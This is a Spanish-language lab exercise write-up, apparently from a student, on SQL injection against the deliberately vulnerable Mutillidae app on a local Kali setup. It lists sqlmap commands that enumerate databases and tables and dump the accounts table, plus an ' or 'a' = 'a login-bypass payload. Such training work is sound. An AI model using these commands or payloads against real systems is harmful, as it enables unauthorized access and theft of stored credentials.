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EJERCICIOS SQL INJECT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Prerrequisitos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Kali Linux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OWASP BWE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1 - SQLMap en Mutillidae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Realizar los ataques de SQL Injection de la aplicación Mutillidae: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OWASP 2013 -&gt; A1 - Injection (SQL) -&gt; SQLi Extract Data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Ejecuta el siguiente comando para detectar y explorar inyecciones SQL en la URL proporcionada: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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=user-info.php&amp;username=1" --batch --forms --level 5 --risk 3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Al entrar en SQLi Extract Data te pide que metas unas credenciales. En Usuario no escribimos nada y en password ponemos lo siguiente : ' or 'a' = 'a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95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OWASP 2013 -&gt; A1 - Injection (SQL) -&gt; SQLi Bypass Authentication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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=login.php" --data="username=admin&amp;password=admin" --batch --forms --level 5 --risk 3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679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OWASP 2013 -&gt; A1 - Injection (SQL) -&gt; SQLMap Practice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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=sql-injection-practice.php" --batch --forms --level 5 --risk 3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67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Intentar conseguir la siguiente información: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Toda esa información tarda muchisimo en cargar asi que voy a poner solamente un pantallazo del comando ejecutándose para no tener que esperar 5 horas por ejercicio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Base de datos que se está utilizando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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=user-info.php&amp;username=1" --batch --forms --level 5 --risk 3 --dbs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0767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Tablas de la base de datos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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=user-info.php&amp;username=1" --batch --forms --level 5 --risk 3 -D mutillidae --tables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401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Columnas de la base de datos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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=user-info.php&amp;username=1" --batch --forms --level 5 --risk 3 -D mutillidae -T accounts --columns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Esquema completo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sqlmap -u "http://192.168.1.75/mutillidae/index.php?page=user-info.php&amp;username=1" --batch --forms --level 5 --risk 3 -D mutillidae -T accounts --dump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40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